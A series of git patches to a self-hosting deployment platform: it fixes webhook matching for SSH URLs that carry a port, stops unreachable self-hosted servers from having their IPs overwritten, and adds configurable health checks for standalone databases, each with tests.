+            // scp-style SSH URLs embed a custom port as "git@host:2222/owner/repo".
+            // Strip the leading numeric port segment so the path matches the webhook
+            // payload's owner/repo, consistent with convertGitUrl() in shared.php.
+            $path = preg_replace('#^\d+/#', '', $path) ?? $path;
         } else {
             $path = $gitRepository;
         }
diff --git a/tests/Feature/Webhook/WebhookHmacTest.php b/tests/Feature/Webhook/WebhookHmacTest.php
index be2417462..3f49ff43d 100644
--- a/tests/Feature/Webhook/WebhookHmacTest.php
+++ b/tests/Feature/Webhook/WebhookHmacTest.php
@@ -509,6 +509,48 @@ function createApplicationWithWebhook(string $repo = 'test-org/test-repo', strin
         expect($response->getContent())->not->toContain('No applications found');
     });
 
+    test('gitlab matches scp-style ssh repository URL with custom port', function () {
+        $app = createApplicationWithWebhook(overrides: [
+            'git_repository' => 'git@gitlab.example.com:2222/services/xyz.git',
+            'git_branch' => 'master',
+        ]);
+        $secret = $app->manual_webhook_secret_gitlab;
+
+        $response = $this->postJson('/webhooks/source/gitlab/events/manual', [
+            'object_kind' => 'push',
+            'ref' => 'refs/heads/master',
+            'project' => ['path_with_namespace' => 'services/xyz'],
+            'after' => 'abc123',
+            'commits' => [],
+        ], [
+            'X-Gitlab-Token' => $secret,
+        ]);
+
+        $response->assertOk();
+        expect($response->getContent())->not->toContain('No applications found');
+    });
+
+    test('gitlab matches scp-style ssh repository URL without port', function () {
+        $app = createApplicationWithWebhook(overrides: [
+            'git_repository' => 'git@gitlab.example.com:services/xyz.git',
+            'git_branch' => 'master',
+        ]);
+        $secret = $app->manual_webhook_secret_gitlab;
+
+        $response = $this->postJson('/webhooks/source/gitlab/events/manual', [
+            'object_kind' => 'push',
+            'ref' => 'refs/heads/master',
+            'project' => ['path_with_namespace' => 'services/xyz'],
+            'after' => 'abc123',
+            'commits' => [],
+        ], [
+            'X-Gitlab-Token' => $secret,
+        ]);
+
+        $response->assertOk();
+        expect($response->getContent())->not->toContain('No applications found');
+    });
+
     test('github matches repository case-insensitively', function () {
         $app = createApplicationWithWebhook(overrides: [
             'git_repository' => 'https://github.com/Test-Org/Test-Repo.git',

From 1b68f11ec0864f3de0a7dac017b2fd68aec0d6f3 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 31 May 2026 21:47:18 +0200
Subject: [PATCH 51/90] fix(cleanup): disable unreachable self-hosted servers

Preserve self-hosted server IPs during unreachable cleanup and force-disable them instead. Keep cloud cleanup behavior overwriting the IP, with test coverage for both paths.
---
 .../Commands/CleanupUnreachableServers.php    | 10 +++++--
 .../Feature/CleanupUnreachableServersTest.php | 28 ++++++++++++++++++-
 2 files changed, 34 insertions(+), 4 deletions(-)

diff --git a/app/Console/Commands/CleanupUnreachableServers.php b/app/Console/Commands/CleanupUnreachableServers.php
index 09563a2c3..666e98a18 100644
--- a/app/Console/Commands/CleanupUnreachableServers.php
+++ b/app/Console/Commands/CleanupUnreachableServers.php
@@ -18,9 +18,13 @@ public function handle()
         if ($servers->count() > 0) {
             foreach ($servers as $server) {
                 echo "Cleanup unreachable server ($server->id) with name $server->name";
-                $server->update([
-                    'ip' => '1.2.3.4',
-                ]);
+                if (isCloud()) {
+                    $server->update([
+                        'ip' => '1.2.3.4',
+                    ]);
+                } else {
+                    $server->forceDisableServer();
+                }
             }
         }
     }
diff --git a/tests/Feature/CleanupUnreachableServersTest.php b/tests/Feature/CleanupUnreachableServersTest.php
index c06944969..8849b1ca0 100644
--- a/tests/Feature/CleanupUnreachableServersTest.php
+++ b/tests/Feature/CleanupUnreachableServersTest.php
@@ -6,7 +6,30 @@
 
 uses(RefreshDatabase::class);
 
-it('cleans up servers with unreachable_count >= 3 after 7 days', function () {
+it('disables (non-destructively) self-hosted servers with unreachable_count >= 3 after 7 days', function () {
+    config(['constants.coolify.self_hosted' => true]);
+
+    $team = Team::factory()->create();
+    $server = Server::factory()->create([
+        'team_id' => $team->id,
+        'unreachable_count' => 50,
+        'unreachable_notification_sent' => true,
+        'updated_at' => now()->subDays(8),
+    ]);
+
+    $originalIp = (string) $server->ip;
+
+    $this->artisan('cleanup:unreachable-servers')->assertSuccessful();
+
+    $server->refresh();
+    // IP must be preserved — never overwritten on self-hosted.
+    expect($server->ip)->toBe($originalIp);
+    expect($server->settings->force_disabled)->toBeTrue();
+});
+
+it('overwrites the IP with 1.2.3.4 on cloud for servers with unreachable_count >= 3 after 7 days', function () {
+    config(['constants.coolify.self_hosted' => false]);
+
     $team = Team::factory()->create();
     $server = Server::factory()->create([
         'team_id' => $team->id,
@@ -36,6 +59,7 @@
 
     $server->refresh();
     expect($server->ip)->toBe($originalIp);
+    expect($server->settings->force_disabled)->toBeFalse();
 });
 
 it('does not clean up servers updated within 7 days', function () {
@@ -53,6 +77,7 @@
 
     $server->refresh();
     expect($server->ip)->toBe($originalIp);
+    expect($server->settings->force_disabled)->toBeFalse();
 });
 
 it('does not clean up servers without notification sent', function () {
@@ -70,4 +95,5 @@
 
     $server->refresh();
     expect($server->ip)->toBe($originalIp);
+    expect($server->settings->force_disabled)->toBeFalse();
 });

From d423223d38ebe200427a235cdb213ff9bc78941a Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sun, 31 May 2026 21:50:10 +0200
Subject: [PATCH 52/90] feat(database): configure standalone health checks

Add configurable health check settings for standalone databases and apply them to generated Docker Compose services. Allow disabling health checks and cover the behavior with feature tests.
---
 app/Actions/Database/StartClickhouse.php      | 11 ++-
 app/Actions/Database/StartDragonfly.php       | 11 ++-
 app/Actions/Database/StartKeydb.php           | 11 ++-
 app/Actions/Database/StartMariadb.php         | 11 ++-
 app/Actions/Database/StartMongodb.php         | 11 ++-
 app/Actions/Database/StartMysql.php           | 11 ++-
 app/Actions/Database/StartPostgresql.php      | 11 ++-
 app/Actions/Database/StartRedis.php           | 11 ++-
 .../Controllers/Api/DatabasesController.php   | 17 +++-
 app/Livewire/Project/Database/Health.php      | 81 +++++++++++++++++++
 app/Models/StandaloneClickhouse.php           | 14 +++-
 app/Models/StandaloneDragonfly.php            | 14 +++-
 app/Models/StandaloneKeydb.php                | 14 +++-
 app/Models/StandaloneMariadb.php              | 14 +++-
 app/Models/StandaloneMongodb.php              | 14 +++-
 app/Models/StandaloneMysql.php                | 14 +++-
 app/Models/StandalonePostgresql.php           | 14 +++-
 app/Models/StandaloneRedis.php                | 14 +++-
 app/Traits/HasDatabaseHealthCheck.php         | 34 ++++++++
 ...d_health_check_to_standalone_databases.php | 47 +++++++++++
 openapi.json                                  | 20 +++++
 openapi.yaml                                  | 15 ++++
 .../project/database/configuration.blade.php  |  4 +
 .../project/database/health.blade.php         | 26 ++++++
 routes/web.php                                |  1 +
 tests/Feature/DatabaseHealthCheckTest.php     | 45 +++++++++++
 26 files changed, 448 insertions(+), 42 deletions(-)
 create mode 100644 app/Livewire/Project/Database/Health.php
 create mode 100644 app/Traits/HasDatabaseHealthCheck.php
 create mode 100644 database/migrations/2026_05_31_000000_add_health_check_to_standalone_databases.php
 create mode 100644 resources/views/livewire/project/database/health.blade.php
 create mode 100644 tests/Feature/DatabaseHealthCheckTest.php

diff --git a/app/Actions/Database/StartClickhouse.php b/app/Actions/Database/StartClickhouse.php
index 30cae71f1..1128b8f8f 100644
--- a/app/Actions/Database/StartClickhouse.php
+++ b/app/Actions/Database/StartClickhouse.php
@@ -52,10 +52,10 @@ public function handle(StandaloneClickhouse $database)
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
                     'healthcheck' => [
                         'test' => ['CMD', 'clickhouse-client', '--user', (string) $this->database->clickhouse_admin_user, '--password', (string) $this->database->clickhouse_admin_password, '--query', 'SELECT 1'],
-                        'interval' => '5s',
-                        'timeout' => '5s',
-                        'retries' => 10,
-                        'start_period' => '5s',
+                        'interval' => "{$this->database->health_check_interval}s",
+                        'timeout' => "{$this->database->health_check_timeout}s",
+                        'retries' => $this->database->health_check_retries,
+                        'start_period' => "{$this->database->health_check_start_period}s",
                     ],
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
@@ -98,6 +98,9 @@ public function handle(StandaloneClickhouse $database)
         $docker_run_options = convertDockerRunToCompose($this->database->custom_docker_run_options);
         $docker_compose = generateCustomDockerRunOptionsForDatabases($docker_run_options, $docker_compose, $container_name, $this->database->destination->network);
 
+        if (! $this->database->isHealthcheckEnabled()) {
+            unset($docker_compose['services'][$container_name]['healthcheck']);
+        }
         $docker_compose = Yaml::dump($docker_compose, 10);
         $docker_compose_base64 = base64_encode($docker_compose);
         $this->commands[] = "echo '{$docker_compose_base64}' | base64 -d | tee $this->configuration_dir/docker-compose.yml > /dev/null";
diff --git a/app/Actions/Database/StartDragonfly.php b/app/Actions/Database/StartDragonfly.php
index addc30be4..530ba7d23 100644
--- a/app/Actions/Database/StartDragonfly.php
+++ b/app/Actions/Database/StartDragonfly.php
@@ -108,10 +108,10 @@ public function handle(StandaloneDragonfly $database)
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
                     'healthcheck' => [
                         'test' => ['CMD', 'redis-cli', '-a', (string) $this->database->dragonfly_password, 'ping'],
-                        'interval' => '5s',
-                        'timeout' => '5s',
-                        'retries' => 10,
-                        'start_period' => '5s',
+                        'interval' => "{$this->database->health_check_interval}s",
+                        'timeout' => "{$this->database->health_check_timeout}s",
+                        'retries' => $this->database->health_check_retries,
+                        'start_period' => "{$this->database->health_check_start_period}s",
                     ],
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
@@ -182,6 +182,9 @@ public function handle(StandaloneDragonfly $database)
         $docker_run_options = convertDockerRunToCompose($this->database->custom_docker_run_options);
         $docker_compose = generateCustomDockerRunOptionsForDatabases($docker_run_options, $docker_compose, $container_name, $this->database->destination->network);
 
+        if (! $this->database->isHealthcheckEnabled()) {
+            unset($docker_compose['services'][$container_name]['healthcheck']);
+        }
         $docker_compose = Yaml::dump($docker_compose, 10);
         $docker_compose_base64 = base64_encode($docker_compose);
         $this->commands[] = "echo '{$docker_compose_base64}' | base64 -d | tee $this->configuration_dir/docker-compose.yml > /dev/null";
diff --git a/app/Actions/Database/StartKeydb.php b/app/Actions/Database/StartKeydb.php
index e59d6f697..e9acd0b3c 100644
--- a/app/Actions/Database/StartKeydb.php
+++ b/app/Actions/Database/StartKeydb.php
@@ -110,10 +110,10 @@ public function handle(StandaloneKeydb $database)
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
                     'healthcheck' => [
                         'test' => ['CMD', 'keydb-cli', '--pass', (string) $this->database->keydb_password, 'ping'],
-                        'interval' => '5s',
-                        'timeout' => '5s',
-                        'retries' => 10,
-                        'start_period' => '5s',
+                        'interval' => "{$this->database->health_check_interval}s",
+                        'timeout' => "{$this->database->health_check_timeout}s",
+                        'retries' => $this->database->health_check_retries,
+                        'start_period' => "{$this->database->health_check_start_period}s",
                     ],
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
@@ -197,6 +197,9 @@ public function handle(StandaloneKeydb $database)
         // Add custom docker run options
         $docker_run_options = convertDockerRunToCompose($this->database->custom_docker_run_options);
         $docker_compose = generateCustomDockerRunOptionsForDatabases($docker_run_options, $docker_compose, $container_name, $this->database->destination->network);
+        if (! $this->database->isHealthcheckEnabled()) {
+            unset($docker_compose['services'][$container_name]['healthcheck']);
+        }
         $docker_compose = Yaml::dump($docker_compose, 10);
         $docker_compose_base64 = base64_encode($docker_compose);
         $this->commands[] = "echo '{$docker_compose_base64}' | base64 -d | tee $this->configuration_dir/docker-compose.yml > /dev/null";
diff --git a/app/Actions/Database/StartMariadb.php b/app/Actions/Database/StartMariadb.php
index ceb1e8b85..17ed2a9a8 100644
--- a/app/Actions/Database/StartMariadb.php
+++ b/app/Actions/Database/StartMariadb.php
@@ -105,10 +105,10 @@ public function handle(StandaloneMariadb $database)
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
                     'healthcheck' => [
                         'test' => ['CMD', 'healthcheck.sh', '--connect', '--innodb_initialized'],
-                        'interval' => '5s',
-                        'timeout' => '5s',
-                        'retries' => 10,
-                        'start_period' => '5s',
+                        'interval' => "{$this->database->health_check_interval}s",
+                        'timeout' => "{$this->database->health_check_timeout}s",
+                        'retries' => $this->database->health_check_retries,
+                        'start_period' => "{$this->database->health_check_start_period}s",
                     ],
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
@@ -202,6 +202,9 @@ public function handle(StandaloneMariadb $database)
             ];
         }
 
+        if (! $this->database->isHealthcheckEnabled()) {
+            unset($docker_compose['services'][$container_name]['healthcheck']);
+        }
         $docker_compose = Yaml::dump($docker_compose, 10);
         $docker_compose_base64 = base64_encode($docker_compose);
         $this->commands[] = "echo '{$docker_compose_base64}' | base64 -d | tee $this->configuration_dir/docker-compose.yml > /dev/null";
diff --git a/app/Actions/Database/StartMongodb.php b/app/Actions/Database/StartMongodb.php
index c79789718..e5973e807 100644
--- a/app/Actions/Database/StartMongodb.php
+++ b/app/Actions/Database/StartMongodb.php
@@ -115,10 +115,10 @@ public function handle(StandaloneMongodb $database)
                             'echo',
                             'ok',
                         ],
-                        'interval' => '5s',
-                        'timeout' => '5s',
-                        'retries' => 10,
-                        'start_period' => '5s',
+                        'interval' => "{$this->database->health_check_interval}s",
+                        'timeout' => "{$this->database->health_check_timeout}s",
+                        'retries' => $this->database->health_check_retries,
+                        'start_period' => "{$this->database->health_check_start_period}s",
                     ],
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
@@ -253,6 +253,9 @@ public function handle(StandaloneMongodb $database)
             $docker_compose['services'][$container_name]['command'] = $commandParts;
         }
 
+        if (! $this->database->isHealthcheckEnabled()) {
+            unset($docker_compose['services'][$container_name]['healthcheck']);
+        }
         $docker_compose = Yaml::dump($docker_compose, 10);
         $docker_compose_base64 = base64_encode($docker_compose);
         $this->commands[] = "echo '{$docker_compose_base64}' | base64 -d | tee $this->configuration_dir/docker-compose.yml > /dev/null";
diff --git a/app/Actions/Database/StartMysql.php b/app/Actions/Database/StartMysql.php
index 0394d50b6..f9d75e0c8 100644
--- a/app/Actions/Database/StartMysql.php
+++ b/app/Actions/Database/StartMysql.php
@@ -105,10 +105,10 @@ public function handle(StandaloneMysql $database)
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
                     'healthcheck' => [
                         'test' => ['CMD', 'mysqladmin', 'ping', '-h', 'localhost', '-u', 'root', "-p{$this->database->mysql_root_password}"],
-                        'interval' => '5s',
-                        'timeout' => '5s',
-                        'retries' => 10,
-                        'start_period' => '5s',
+                        'interval' => "{$this->database->health_check_interval}s",
+                        'timeout' => "{$this->database->health_check_timeout}s",
+                        'retries' => $this->database->health_check_retries,
+                        'start_period' => "{$this->database->health_check_start_period}s",
                     ],
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
@@ -203,6 +203,9 @@ public function handle(StandaloneMysql $database)
             ];
         }
 
+        if (! $this->database->isHealthcheckEnabled()) {
+            unset($docker_compose['services'][$container_name]['healthcheck']);
+        }
         $docker_compose = Yaml::dump($docker_compose, 10);
         $docker_compose_base64 = base64_encode($docker_compose);
         $this->commands[] = "echo '{$docker_compose_base64}' | base64 -d | tee $this->configuration_dir/docker-compose.yml > /dev/null";
diff --git a/app/Actions/Database/StartPostgresql.php b/app/Actions/Database/StartPostgresql.php
index da8b5dc4e..520cbdec4 100644
--- a/app/Actions/Database/StartPostgresql.php
+++ b/app/Actions/Database/StartPostgresql.php
@@ -112,10 +112,10 @@ public function handle(StandalonePostgresql $database)
                     'labels' => defaultDatabaseLabels($this->database)->toArray(),
                     'healthcheck' => [
                         'test' => ['CMD', 'psql', '-U', (string) $this->database->postgres_user, '-d', (string) $this->database->postgres_db, '-c', 'SELECT 1'],
-                        'interval' => '5s',
-                        'timeout' => '5s',
-                        'retries' => 10,
-                        'start_period' => '5s',
+                        'interval' => "{$this->database->health_check_interval}s",
+                        'timeout' => "{$this->database->health_check_timeout}s",
+                        'retries' => $this->database->health_check_retries,
+                        'start_period' => "{$this->database->health_check_start_period}s",
                     ],
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
@@ -213,6 +213,9 @@ public function handle(StandalonePostgresql $database)
             $docker_compose['services'][$container_name]['command'] = $command;
         }
 
+        if (! $this->database->isHealthcheckEnabled()) {
+            unset($docker_compose['services'][$container_name]['healthcheck']);
+        }
         $docker_compose = Yaml::dump($docker_compose, 10);
         $docker_compose_base64 = base64_encode($docker_compose);
         $this->commands[] = "echo '{$docker_compose_base64}' | base64 -d | tee $this->configuration_dir/docker-compose.yml > /dev/null";
diff --git a/app/Actions/Database/StartRedis.php b/app/Actions/Database/StartRedis.php
index c31b099e4..e4bfd98e1 100644
--- a/app/Actions/Database/StartRedis.php
+++ b/app/Actions/Database/StartRedis.php
@@ -111,10 +111,10 @@ public function handle(StandaloneRedis $database)
                             'redis-cli',
                             'ping',
                         ],
-                        'interval' => '5s',
-                        'timeout' => '5s',
-                        'retries' => 10,
-                        'start_period' => '5s',
+                        'interval' => "{$this->database->health_check_interval}s",
+                        'timeout' => "{$this->database->health_check_timeout}s",
+                        'retries' => $this->database->health_check_retries,
+                        'start_period' => "{$this->database->health_check_start_period}s",
                     ],
                     'mem_limit' => $this->database->limits_memory,
                     'memswap_limit' => $this->database->limits_memory_swap,
@@ -194,6 +194,9 @@ public function handle(StandaloneRedis $database)
         $docker_run_options = convertDockerRunToCompose($this->database->custom_docker_run_options);
         $docker_compose = generateCustomDockerRunOptionsForDatabases($docker_run_options, $docker_compose, $container_name, $this->database->destination->network);
 
+        if (! $this->database->isHealthcheckEnabled()) {
+            unset($docker_compose['services'][$container_name]['healthcheck']);
+        }
         $docker_compose = Yaml::dump($docker_compose, 10);
         $docker_compose_base64 = base64_encode($docker_compose);
         $this->commands[] = "echo '{$docker_compose_base64}' | base64 -d | tee $this->configuration_dir/docker-compose.yml > /dev/null";
diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index dc9b6f5b5..e2d2aad92 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -299,6 +299,11 @@ public function database_by_uuid(Request $request)
                         'mysql_user' => ['type' => 'string', 'description' => 'MySQL user'],
                         'mysql_database' => ['type' => 'string', 'description' => 'MySQL database'],
                         'mysql_conf' => ['type' => 'string', 'description' => 'MySQL conf'],
+                        'health_check_enabled' => ['type' => 'boolean', 'description' => 'Enable the database healthcheck probe.'],
+                        'health_check_interval' => ['type' => 'integer', 'description' => 'Healthcheck interval in seconds.'],
+                        'health_check_timeout' => ['type' => 'integer', 'description' => 'Healthcheck timeout in seconds.'],
+                        'health_check_retries' => ['type' => 'integer', 'description' => 'Healthcheck retries count.'],
+                        'health_check_start_period' => ['type' => 'integer', 'description' => 'Healthcheck start period in seconds.'],
                     ],
                 ),
             )
@@ -565,9 +570,17 @@ public function update_by_uuid(Request $request)
                 }
                 break;
         }
+        $allowedFields = array_merge($allowedFields, ['health_check_enabled', 'health_check_interval', 'health_check_timeout', 'health_check_retries', 'health_check_start_period']);
+        $healthCheckValidator = customApiValidator($request->all(), [
+            'health_check_enabled' => 'boolean',
+            'health_check_interval' => 'integer|min:1',
+            'health_check_timeout' => 'integer|min:1',
+            'health_check_retries' => 'integer|min:1',
+            'health_check_start_period' => 'integer|min:0',
+        ]);
         $extraFields = array_diff(array_keys($request->all()), $allowedFields);
-        if ($validator->fails() || ! empty($extraFields)) {
-            $errors = $validator->errors();
+        if ($validator->fails() || $healthCheckValidator->fails() || ! empty($extraFields)) {
+            $errors = $validator->errors()->merge($healthCheckValidator->errors());
             if (! empty($extraFields)) {
                 foreach ($extraFields as $field) {
                     $errors->add($field, 'This field is not allowed.');
diff --git a/app/Livewire/Project/Database/Health.php b/app/Livewire/Project/Database/Health.php
new file mode 100644
index 000000000..33540d74e
--- /dev/null
+++ b/app/Livewire/Project/Database/Health.php
@@ -0,0 +1,81 @@
+<?php
+
+namespace App\Livewire\Project\Database;
+
+use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Livewire\Attributes\Validate;
+use Livewire\Component;
+
+class Health extends Component
+{
+    use AuthorizesRequests;
+
+    public $database;
+
+    #[Validate(['boolean'])]
+    public bool $healthCheckEnabled = true;
+
+    #[Validate(['integer', 'min:1'])]
+    public int $healthCheckInterval = 15;
+
+    #[Validate(['integer', 'min:1'])]
+    public int $healthCheckTimeout = 5;
+
+    #[Validate(['integer', 'min:1'])]
+    public int $healthCheckRetries = 5;
+
+    #[Validate(['integer', 'min:0'])]
+    public int $healthCheckStartPeriod = 5;
+
+    public function mount()
+    {
+        $this->authorize('view', $this->database);
+        $this->syncData();
+    }
+
+    public function syncData(bool $toModel = false): void
+    {
+        if ($toModel) {
+            $this->validate();
+            $this->database->health_check_enabled = $this->healthCheckEnabled;
+            $this->database->health_check_interval = $this->healthCheckInterval;
+            $this->database->health_check_timeout = $this->healthCheckTimeout;
+            $this->database->health_check_retries = $this->healthCheckRetries;
+            $this->database->health_check_start_period = $this->healthCheckStartPeriod;
+            $this->database->save();
+        } else {
+            $this->healthCheckEnabled = $this->database->health_check_enabled;
+            $this->healthCheckInterval = $this->database->health_check_interval;
+            $this->healthCheckTimeout = $this->database->health_check_timeout;
+            $this->healthCheckRetries = $this->database->health_check_retries;
+            $this->healthCheckStartPeriod = $this->database->health_check_start_period;
+        }
+    }
+
+    public function instantSave()
+    {
+        $this->submit();
+    }
+
+    public function submit()
+    {
+        try {
+            $this->authorize('update', $this->database);
+            $this->syncData(true);
+            $this->dispatch('success', 'Health check updated. Restart the database to apply the changes.');
+        } catch (\Throwable $e) {
+            return handleError($e, $this);
+        } finally {
+            if (is_null($this->database->config_hash)) {
+                $this->database->isConfigurationChanged(true);
+            } else {
+                $this->dispatch('configurationChanged');
+            }
+        }
+    }
+
+    public function render()
+    {
+        return view('livewire.project.database.health');
+    }
+}
diff --git a/app/Models/StandaloneClickhouse.php b/app/Models/StandaloneClickhouse.php
index 784e2c937..1e68046f9 100644
--- a/app/Models/StandaloneClickhouse.php
+++ b/app/Models/StandaloneClickhouse.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Traits\ClearsGlobalSearchCache;
+use App\Traits\HasDatabaseHealthCheck;
 use App\Traits\HasMetrics;
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Casts\Attribute;
@@ -11,7 +12,7 @@
 
 class StandaloneClickhouse extends BaseModel
 {
-    use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
+    use ClearsGlobalSearchCache, HasDatabaseHealthCheck, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
         'uuid',
@@ -44,11 +45,21 @@ class StandaloneClickhouse extends BaseModel
         'destination_type',
         'destination_id',
         'environment_id',
+        'health_check_enabled',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
     protected $casts = [
+        'health_check_enabled' => 'boolean',
+        'health_check_interval' => 'integer',
+        'health_check_timeout' => 'integer',
+        'health_check_retries' => 'integer',
+        'health_check_start_period' => 'integer',
         'clickhouse_admin_password' => 'encrypted',
         'public_port_timeout' => 'integer',
         'restart_count' => 'integer',
@@ -111,6 +122,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings;
+        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneDragonfly.php b/app/Models/StandaloneDragonfly.php
index e07053c03..5f76be884 100644
--- a/app/Models/StandaloneDragonfly.php
+++ b/app/Models/StandaloneDragonfly.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Traits\ClearsGlobalSearchCache;
+use App\Traits\HasDatabaseHealthCheck;
 use App\Traits\HasMetrics;
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Casts\Attribute;
@@ -11,7 +12,7 @@
 
 class StandaloneDragonfly extends BaseModel
 {
-    use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
+    use ClearsGlobalSearchCache, HasDatabaseHealthCheck, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
         'uuid',
@@ -43,11 +44,21 @@ class StandaloneDragonfly extends BaseModel
         'destination_type',
         'destination_id',
         'environment_id',
+        'health_check_enabled',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
     protected $casts = [
+        'health_check_enabled' => 'boolean',
+        'health_check_interval' => 'integer',
+        'health_check_timeout' => 'integer',
+        'health_check_retries' => 'integer',
+        'health_check_start_period' => 'integer',
         'dragonfly_password' => 'encrypted',
         'public_port_timeout' => 'integer',
         'restart_count' => 'integer',
@@ -110,6 +121,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings;
+        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneKeydb.php b/app/Models/StandaloneKeydb.php
index 979f45a3d..6d3b5a82b 100644
--- a/app/Models/StandaloneKeydb.php
+++ b/app/Models/StandaloneKeydb.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Traits\ClearsGlobalSearchCache;
+use App\Traits\HasDatabaseHealthCheck;
 use App\Traits\HasMetrics;
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Casts\Attribute;
@@ -11,7 +12,7 @@
 
 class StandaloneKeydb extends BaseModel
 {
-    use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
+    use ClearsGlobalSearchCache, HasDatabaseHealthCheck, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
         'uuid',
@@ -44,11 +45,21 @@ class StandaloneKeydb extends BaseModel
         'destination_type',
         'destination_id',
         'environment_id',
+        'health_check_enabled',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'server_status'];
 
     protected $casts = [
+        'health_check_enabled' => 'boolean',
+        'health_check_interval' => 'integer',
+        'health_check_timeout' => 'integer',
+        'health_check_retries' => 'integer',
+        'health_check_start_period' => 'integer',
         'keydb_password' => 'encrypted',
         'public_port_timeout' => 'integer',
         'restart_count' => 'integer',
@@ -111,6 +122,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->keydb_conf;
+        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
diff --git a/app/Models/StandaloneMariadb.php b/app/Models/StandaloneMariadb.php
index dba8a52f5..1058d8721 100644
--- a/app/Models/StandaloneMariadb.php
+++ b/app/Models/StandaloneMariadb.php
@@ -3,6 +3,7 @@
 namespace App\Models;
 
 use App\Traits\ClearsGlobalSearchCache;
+use App\Traits\HasDatabaseHealthCheck;
 use App\Traits\HasMetrics;
 use App\Traits\HasSafeStringAttribute;
 use Illuminate\Database\Eloquent\Casts\Attribute;
@@ -12,7 +13,7 @@
 
 class StandaloneMariadb extends BaseModel
 {
-    use ClearsGlobalSearchCache, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
+    use ClearsGlobalSearchCache, HasDatabaseHealthCheck, HasFactory, HasMetrics, HasSafeStringAttribute, SoftDeletes;
 
     protected $fillable = [
         'uuid',
@@ -47,11 +48,21 @@ class StandaloneMariadb extends BaseModel
         'destination_type',
         'destination_id',
         'environment_id',
+        'health_check_enabled',
+        'health_check_interval',
+        'health_check_timeout',
+        'health_check_retries',
+        'health_check_start_period',
     ];
 
     protected $appends = ['internal_db_url', 'external_db_url', 'database_type', 'server_status'];
 
     protected $casts = [
+        'health_check_enabled' => 'boolean',
+        'health_check_interval' => 'integer',
+        'health_check_timeout' => 'integer',
+        'health_check_retries' => 'integer',
+        'health_check_start_period' => 'integer',
         'mariadb_password' => 'encrypted',
         'public_port_timeout' => 'integer',
         'restart_count' => 'integer',
@@ -114,6 +125,7 @@ protected function serverStatus(): Attribute
     public function isConfigurationChanged(bool $save = false)
     {
         $newConfigHash = $this->image.$this->ports_mappings.$this->mariadb_conf;
+        $newConfigHash .= $this->health_check_enabled.$this->health_check_interval.$this->health_check_timeout.$this->health_check_retries.$this->health_check_start_period;
         $newConfigHash .= json_encode($this->environment_variables()->get('value')->sort());
         $newConfigHash = md5($newConfigHash);
         $oldConfigHash = data_get($this, 'config_hash');
